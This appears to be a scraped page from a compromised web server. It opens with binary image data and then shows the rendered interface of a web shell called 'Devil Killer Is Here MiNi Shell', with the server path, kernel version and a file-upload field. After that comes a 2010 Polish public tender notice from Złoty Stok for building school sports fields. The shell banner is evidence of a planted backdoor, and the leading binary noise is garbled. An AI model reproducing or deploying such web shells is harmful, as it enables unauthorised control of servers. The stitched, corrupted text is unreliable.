JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100505/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100505/123964-N-2010.html

<p class="kh_header"><b>Złoty Stok: Kompleks boisk sportowych przy Samorządowym Zespole Szkół w Złotym Stoku</b><br>
<b>Numer ogłoszenia: 123964 - 2010; data zamieszczenia: 05.05.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Złoty Stok , ul. Rynek 22, 57-250 Złoty Stok, tel. 0 74 8164164, faks 0 74 8164133.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zlotystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Kompleks boisk sportowych przy Samorządowym Zespole Szkół w Złotym Stoku.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest inwestycja polegająca na wykonaniu kompleksu wielofunkcyjnych boisk sportowych przy Samorządowym Zespole Szkół w Złotym Stoku, ul. Chemików 8, dz. nr ewid. 345,340/2 obręb Złoty Stok.
Zadanie obejmuje w swym zakresie budowę zespołu boisk sportowych i bieżni sportowej o nawierzchniach sztucznych, trawiastych i poliuretanowych, jako boisk ogólnie dostępnych. Ponadto do wykonania jest zagospodarowanie terenu Zespołu Szkół od strony południowo-zachodniej w ciągi komunikacyjne dla pieszych i dla samochodów osobowych, nowe schody wejściowe do budynku szkoły wraz z przystosowaniem dla osób niepełnosprawnych, poruszających się na wózkach inwalidzkich, poprzez pochylnię wjazdową o spadku 6% z terenów sportowych.
Do realizacji przewidziano również elementy małej architektury, takie jak: wiatę rekreacyjną, trejaż, gazony z zielenią wykonane z cegły klinkierowej, murki ozdobne z cegły klinkierowej wraz z siedziskami, place rekreacyjne o nawierzchni naturalnej, z kostki kamiennej, foremnej, murek ogniowy p.poż. przy zbiornikach z gazem propan-butan z cegły klinkierowej, ogrodzenie terenu wokół zespołu boisk sportowych wraz z piłkochwytami wykonanymi z siatki stalowej powlekanej, 
Do wykonania jest również odwodnienie płyt boisk sportowych, bieżni sportowej oraz powierzchni utwardzonych, poprzez drenaż wgłębny z odprowadzeniem wód opadowych do istniejącej kanalizacji deszczowej, zlokalizowanej na działce nr 340/2 i 345, zgodnie z warunkami technicznymi, które określił właściciel sieci, oświetlenie zespołu boisk sportowych (maks. 200 LUX-ów) oraz oświetlenie pozostałych elementów zagospodarowania, 10 miejsc postojowych dla samochodów o nawierzchni utwardzonej z kostki betonowej typu  Polbruk  o grubości 8,0cm wraz z odwodnieniem. 
Powiązanie komunikacyjne miejsca realizacji inwestycji jest zapewnione przez istniejący wjazd z drogi wewnętrznej gminnej, asfaltowej od strony ul. Chemików. 

Szczegółowe wytyczne dotyczące wykonania prac, ich ilości i materiałów do wbudowania znajdują się w dokumentacji technicznej przedsięwzięcia i przedmiarze pomocniczym. 
Wszystkie elementy drewniane należy zaimpregnować.
W zakresie robót do wykonania są:

I.  Prace przygotowawcze i zabezpieczające teren robót .
- opracowanie ogólnego harmonogramu prac, 
- prace geodezyjne i pomiarowe, 
- prace zabezpieczające miejsce prowadzonych robót przed osobami postronnymi wraz z właściwym oznakowaniem,
- prace zabezpieczające istniejącą zieleń wysoką,
- uzyskanie zezwoleń i wycinka kolidującej z inwestycją zieleni wysokiej.

II.  Roboty rozbiórkowe i demontażowe budynku łącznika i elementów niewybudowanej sali sportowej.
- rozebranie istniejących fundamentów, ścian fundamentowych i pozostałych elementów konstrukcyjnych niewybudowanej sali sportowej wraz z ich wywozem i utylizacją powstałych odpadów,
- rozebranie obiektu łącznika wraz z wywozem gruzu i utylizacją powstałych odpadów.

III. Prace związane z budową boiska wielofunkcyjnego o nawierzchni poliuretanowej.
Roboty ziemne.
-  usunięcie warstwy ziemi urodzajnej (humusu) o grub. do 30cm - 957m2,
-  wykonanie koryta na całej szerokości w gruncie kat. I-IV głęb. 40cm - 957m2,
-  wykonanie rowków o wymiarach 28x50 cm pod krawężniki i ławy krawężnikowe w
gruncie kat. I-II - 124m,	
- wykonanie podsypki z piasku pod ławę betonową - 3,472m3,
- wykonanie ławy pod krawężniki - 7,068m3,
- ułożenie obrzeży betonowych na podsypce piaskowej - 124m.
Roboty związane z odwodnieniem i wykonaniem podbudowy z tłucznia.
- wykonanie wykopów pod drenaż - 65,889m3,
- wykonanie warstwy wzmacniającej z geowłókniny - 1264,395m2,
- wykonanie piaskowej podsypki filtracyjnej grub. 15cm - 12,029m3,
- ułożenie drenażu z rur PCV - 267,3m, wraz z 6 połączeniami i obsypką,
- wykonanie podbudowy z kruszywa naturalnego - warstwa dolna o grubości po zagęszczeniu 45cm - zasypanie wykopów - 126,968m2,
Roboty związane z wykonaniem nawierzchni z poliuretanu.
- wykonanie podsypki piaskowej  grub. warstwy po zagęszczeniu 15cm - 796,62m2,
- wykonanie warstwy stabilizującej z kruszyw łamanych o grubości 25cm - 957,0m2,     
- wykonanie warstwy nawierzchni poliuretanowej wraz z malowaniem linii boiskowych  - 957,0m2.

IV. Prace związane z budową boiska wielofunkcyjnego z bieżnią i skocznią do skoku w dal.
Roboty ziemne.
-  usunięcie warstwy ziemi urodzajnej (humusu) o grub. do 30cm - 2633,940m2,
-  wykonanie koryta na całej szerokości w gruncie kat. I-IV głęb. 40cm - 2633,94m2,
-  wykonanie rowków o wymiarach 28x50 cm pod krawężniki i ławy krawężnikowe w
gruncie kat. I-II - 606,920m,	
- wykonanie podsypki z piasku pod ławę betonową - 16,994m3,
- wykonanie ławy pod krawężniki - 34,594m3,
- ułożenie obrzeży betonowych na podsypce piaskowej - 606,92m.
Roboty związane z odwodnieniem i wykonaniem podbudowy z tłucznia.
- wykonanie wykopów pod drenaż - 139,100m3,
- wykonanie warstwy wzmacniającej z geowłókniny - 3282,885m2,
- wykonanie piaskowej podsypki filtracyjnej grub. 15cm - 25,394m3,
- ułożenie drenażu z rur PCV - 564,3m, wraz z 14 połączeniami i obsypką,
- wykonanie podbudowy z kruszywa naturalnego - warstwa dolna o grubości po zagęszczeniu 55cm - zasypanie wykopów - 268,043m2,

Roboty związane z wykonaniem nawierzchni z trawy sztucznej.
- wykonanie podbudowy z kruszyw łamanych - warstwa dolna o grubości 20cm - 1486,34m2,
- wykonanie podbudowy z kruszyw łamanych - warstwa górna o grubości 5cm - 1486,34m2,
- wykonanie nawierzchni z trawy syntetycznej z wypełnieniem piaskiem, 100% polipropylen, odpornej na mróz i wysokie temperatury, ustabilizowanej UV, kolor zielony wraz z :
połączeniem pasów trawy, zasypaniem piaskiem kwarcowym o granulacji 0,2-0,8mm - 1486,34m2, 
- rozścielenie piasku kwarcowego na ułożonej i umocowanej wykładzinie -1486,34m2, 
- malowanie linii boiskowych - 800m2,
Roboty związane z wykonaniem nawierzchni z poliuretanu (bieżnia).
- wykonanie podsypki piaskowej  grub. warstwy po zagęszczeniu 15cm - 1123,6m2,
- wykonanie warstwy stabilizującej z kruszyw łamanych o grubości 25cm - 1123,6m2,
-  wykonanie warstwy nawierzchni poliuretanowej wraz z malowaniem linii torów biegowych  - 1123,6m2,
Roboty związane z wykonaniem nawierzchni z poliuretanu (skocznia skoków w dal).   
- wykonanie podsypki piaskowej  grub. warstwy po zagęszczeniu 10cm - 24,0m2,
- wykonanie podbudowy z kruszywa naturalnego o grubości 20cm - 24,0m2,
-  wykonanie warstwy piaskowej grub. 25cm  - 24,0m2,

V. Umocnienie skarp płytami typu IOMB.
- wykonanie koryta pod płyty wielootworowe wraz z ułożeniem podsypki piaskowej grub. 10cm i umocowaniem płyt - 148m2,

VI. Wykonanie nawierzchni naturalnych trawiastych.
- usunięcie warstwy ziemi urodzajnej (humusu) o grub. do 15cm - 840m2,
- wykonanie podłoża pod trawniki o grub. 15cm - 840m2,
- wykonanie trawników dywanowych siewem - 840m2,
 
VII. Prace związane z wykonaniem ciągów komunikacyjnych.
Roboty związane z wykonaniem ciągów komunikacyjnych dla pieszych.
- wykonanie koryta na całej szerokości chodników i dojść wraz z profilowaniem i zagęszczeniem podłoża - 253m2,
- wykonanie rowków pod krawężniki o wym. 30x8cm, ław oraz osadzenie obrzeży betonowych na podsypce cementowo-piaskowej -290m,
- wykonanie podsypki cementowo-piaskowej o grub. warstwy po zagęszczeniu 5cm wraz z ułożeniem nawierzchni z płyt betonowych o strukturze wierzchniej ziarnistej 40x40x5cm - 253m,
Roboty związane z wykonaniem placu rekreacyjnego. 
- wykonanie koryta na całej szerokości placu, głęb. 40cm. wraz z profilowaniem i zagęszczeniem podłoża - 364m2,
- wykonanie rowków pod krawężniki o wym. 8x25cm, ław oraz osadzenie obrzeży kamiennych na podsypce cementowo-piaskowej - 15m,
- wykonanie chodników z kostki kamiennej o wysokości 10cm na podsypce cementowo-
piaskowej z wypełnieniem spoin zaprawą cementową -364m2,
Roboty związane z wykonaniem placów  i ciągów jezdnych .
- wykonanie koryta na całej szerokości ciągu jezdnego głęb. 53cm wraz z profilowaniem i zagęszczeniem podłoża - 250m2,
- wykonanie podsypki piaskowej grub. warstwy po zagęszczeniu 20cm - 250m2,
- wykonanie rowków pod krawężniki o wym. 25x8cm, ław oraz osadzenie obrzeży betonowych na podsypce piaskowej - 15m,
- wykonanie podbudowy betonowej grub. warstwy po zagęszczeniu 20cm - 250m2,
- wykonanie nawierzchni z kostki betonowej typu Polbruk grub. 8cm na podsypce piaskowo-cementowej grub. 5cm z zalaniem spoin zaprawą cementową z pasami rozdzielczymi250m2, 

VIII. Prace związane z wykonaniem ogrodzenia kompleksu boisk i piłkochwytów.
- rozebranie elementów istniejącego ogrodzenia - 34m2,
- wykonanie wykopów ziemnych pod ławy fundamentowe - 37,8m2,
- wykonanie podkładu betonowego na podłożu gruntowym - 8,4m3,
- wykonanie ław żelbetowych wraz z izolacją przeciwwilgociową pionową z roztworów asfaltowych dwie warstwy - 29.4m3,
- wykonanie murków z cegły klinkierowej wraz ze spoinowaniem zaprawą cementową barwioną - 75, 6m2,
- wykonanie wykopów ziemnych pod stopy fundamentowe - 8,098m3,
- wykonanie stóp fundamentowych betonowych - 8,098m3,
- wykonanie ogrodzenia z siatki na słupkach z rur stalowych o rozstawie 3.0 m i wys. 4.0 m wraz z zabezpieczeniem antykorozyjnym i powłoką malarską - 70m, 
- wykonanie ogrodzenia z siatki na słupkach z rur stalowych o rozstawie 3.0 m i wys. 3.0 m wraz z zabezpieczeniem antykorozyjnym i powłoką malarską  - 245m, 
- wykonanie ogrodzenia z siatki na słupkach z rur stalowych o rozstawie 3.0 m i wys. 2.0 m wraz z zabezpieczeniem antykorozyjnym i powłoką malarską  - 38m,
- wykonanie bramy stalowej 2-skrzydłowej o wym. 400x200cm  - 2szt. i furtki o wym. 120x220 cm - 2szt.

IX. Prace związane z wykonaniem elementów małej architektury.
Roboty w zakresie wykonania murków ozdobnych, gazonów, siedzisk.
- roboty ziemne, wykopy pod fundamenty - 40.022m3,
- wykonanie podkładu betonowego na podłożu gruntowym - 8,128m3,
- wykonanie ław żelbetowych wraz z izolacją przeciwwilgociową pionową z roztworów asfaltowych, dwie warstwy - 31.894m3,
- wykonanie ścian fundamentowych z bloczków betonowych na zaprawie cementowej - 27,303m3,
- wykonanie murów z cegły klinkierowej wraz ze spoinowaniem zaprawą cementową barwioną - 140,136m2,
- montaż listew siedzeń z tworzyw sztucznych - 120m,
- przygotowanie terenu pod nasady kwiatowe wraz z obsadzeniem kwietników - 42,250m2,
- wykonanie i montaż bramy stalowej 2-skrzydłowej o wym. 360x200cm - 1szt,
- montaż masztów flagowych na fundamencie - 2szt.
Roboty w zakresie wykonania wiatki z zadaszeniem.
- roboty ziemne, wykopy pod fundamenty - 1,44m3,
- wykonanie fundamentów z betonu żwirowego - 1,44m3,
- wykonanie słupów z cegły klinkierowej wraz ze zbrojeniem - 1,695m3,
- wykonanie konstrukcji wieńczącej - oczepów z krawędziaków - 1,850m3, deskowania połaci dachowej z tarcicy nasyconej - 41.04m2,
- wykonanie pokrycia dachu papą na podłożu drewnianym jednowarstwowo, dachówką bitumiczną o kształcie łuski mocowaną na gwoździe - 41.04m2.
- roboty w zakresie wykonania trejażu drewnianego i siedzisk - 0,735m3,
- roboty w zakresie wykonania pergoli drewnianej i siedzisk - 2,173m3,
Roboty w zakresie wykonania wiatki z zadaszeniem na pojemniki na odpady stałe.
- roboty ziemne, wykopy pod fundamenty - 0,809m3,
- wykonanie fundamentów z betonu żwirowego - 0,720m3,
-  wykonanie ław żelbetowych - 0,809m3,
- wykonanie ścian fundamentowych z bloczków betonowych na zaprawie cementowej - 0,394m3,
- wykonanie ścian z cegły pełnej na zaprawie cementowej - 11,76m2, słupów z cegły klinkierowej - 0,565m3,
- wykonanie konstrukcji wieńczącej - oczepów z krawędziaków - 0,781m3, deskowania połaci dachowej z tarcicy nasyconej - 26,120m2,
- wykonanie pokrycia dachu papą na podłożu drewnianym jednowarstwowo, dachówką bitumiczną o kształcie łuski mocowaną na gwoździe - 26.12m2.
Roboty w zakresie wykonania siedzisk dla uczniów przy boisku.
- roboty ziemne, wykopy pod fundamenty -  2,76m3,
- wykonanie fundamentów z betonu żwirowego - 1,920m3,
- wykonanie ław żelbetowych - 0,840m3,
- wykonanie ścian fundamentowych z bloczków betonowych na zaprawie cementowej - 1,575m3,
- wykonanie ścian z cegły klinkierowej na zaprawie cementowej - 5,6m2,
- montaż listew siedzeń z tworzyw sztucznych - 42m.
Roboty w zakresie montażu pozostałych elementów małej architektury.
- montaż koszy na śmieci - 18szt, ławek drewnianych - 15szt, stojaków na rowery - 2szt, słupów ogłoszeniowych - 2szt.

X. Prace związane z wykonaniem pochylni i schodów zewnętrznych.  
- wykonanie podkładu z ubitych materiałów sypkich na podłożu gruntowym - 16,425m3,
- wykonanie podkładu betonowego na podłożu - 6,570m3, wraz z izolacją przeciwwilgociową z folii polietylenowej - 50,217m2 ,warstwy wyrównawczej betonowej - 16,425m3,
- wykonanie schodów żelbetowych i pochylni - 7,121m3, wraz z balustradami i pochwytami,
- wykonanie okładziny schodów  i pochylni z płytek 40x40cm betonowych na kleju
z odsłoniętą warstwą kruszywa mineralnego - 28,385m2,
- roboty ziemne, wykopy pod fundamenty -  14,933m3,
- wykonanie ław betonowych - 14,933m3,
- wykonanie murków z cegły klinkierowej na zaprawie cementowej wraz ze spoinowaniem zaprawą cementową barwioną - 14,933m2.

XI. Prace związane  z wykonaniem przyłącza kanalizacji deszczowej.
- roboty ziemne wykopy - 420m3,
- roboty ziemne wykopy liniowe - 29m3,
- wykonanie podłoża z materiałów sypkich pod kanały grub. warstwy 15cm - 198m2,
- ułożenie kanałów z rur kanalizacyjnych PCW, łączonych na wcisk o 160 - 175,5m,
- ułożenie kanałów z rur kanalizacyjnych PCW, łączonych na wcisk o 110 - 72m,
- ułożenie trójników o 160-80-160 - 6szt, o 110-80-110 - 14szt,
- ułożenie studzienek kanalizacyjnych systemowych WAVIN, o średnicy 425mm, zamknięte rurą teleskopową z wpustem deszczowym (kinieta z PE) - 5szt,
- ułożenie studzienek kanalizacyjnych systemowych WAVIN, o średnicy 425mm, zamknięte rurą teleskopową z pokrywą żeliwną (kinieta z PE) - 3szt,
- ułożenie studzienek kanalizacyjnych systemowych WAVIN, o średnicy 315mm, zamknięte rurą teleskopową z pokrywą żeliwną (kinieta z PE) - 3szt,
- wykonanie przebić w istniejących studniach - 6szt
- wykonanie obsypki rurociągu oraz zasypanie wykopów wraz z ich zagęszczeniem.

XII. Prace związane  z wykonaniem instalacji elektrycznej oświetlenia kompleksu boisk.
- roboty ziemne - wykonanie rowów dla kabli - 100m,
- układanie kabli wielożyłowych - 100m, wraz z obsypką min 10cm, zasypaniem wykopu,
- montaż rozdzielnicy wolnostojącej - 1szt i końcówek - 104szt, 
- montaż uziomu powierzchniowego w wykopie - 350m, 
- instalowanie gotowych wysięgników ocynkowanych typu parkowego - 8szt, wraz z oprawami 16szt, oraz opraw trawnikowych - 3szt,
- montaż i ustawienie masztów oświetleniowych 12 szt, wraz z oprawami 12szt, 
- ułożenie przewodów wyrównawczych w budynku -100m, wraz z osłonami - 120m,
- montaż obudowy tablic rozdzielczych - 1szt,

XIII. Montaż wyposażenia sportowego boisk.
- montaż wyposażenia siatkarskiego -  stojaków do siatkówki aluminiowych, stanowiska sędziowskiego z regulacją wysokości podestu, podstawką do pisania, siatki - 2 zestawy o parametrach normowych z certyfikatem bezpieczeństwa,   
- montaż wyposażenia do tenisa ziemnego - stojaków aluminiowych do siatki, siatki - 2 zestawy o parametrach normowych z certyfikatem bezpieczeństwa,   
- montaż wyposażenia do koszykówki - kosze zewnętrzne na konstrukcji wsporczej - 4 szt. o parametrach normowych z certyfikatem bezpieczeństwa,
- montaż wyposażenia do piłki ręcznej - bramki aluminiowe z łukami składanymi, demontowalne wraz z siatkami - 1 zestaw o parametrach normowych z certyfikatem bezpieczeństwa,   
- dostawa wyposażenia sportowego - zestaw piłek do gier zespołowych : do piłki koszykowej - 10 sztuk, do piłki ręcznej 10 sztuk (5szt - damskich, 5szt - męskich), do piłki nożnej - 10 sztuk, do piłki siatkowej - 10 sztuk,
do tenisa ziemnego - 30 sztuk, rakiety do tenisa ziemnego - 8 sztuk,
-  chorągiewki narożne boiskowe z tyczkami, z PCV - 6szt,
- bloki startowe do bieżni startowej - 5szt,

XIV. Prace związane z odbiorami technicznymi, geodezyjnymi pomiarami powykonawczymi, uporządkowaniem terenu i  przekazaniem do eksploatacji.
- wykonanie odbiorów technicznych, pomiarów, badań i sprawdzeń instalacji kanalizacji deszczowej i elektrycznej,
- wywiezienie nadmiaru ziemi, gruzu, i innych powstałych odpadów,
- uporządkowanie budowy i przyległych terenów,
- wykonanie dokumentacji geodezyjnej powykonawczej,
- wykonanie dokumentacji powykonawczej i dokumentacji niezbędnej do uzyskania decyzji administracyjnej pozwolenie na użytkowanie..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.21.22.21-1, 45.23.24.51-8, 45.23.21.30-2, 45.11.12.00-0, 45.23.61.10-4, 37.41.00.00-5, 45.23.32.50-6, 77.31.41.00-5, 45.23.32.00-1, 45.23.32.22-1, 45.34.20.00-6, 45.11.11.00-9, 45.26.10.00-4, 45.45.00.00-6, 45.31.00.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.11.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>na podstawie złożonych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

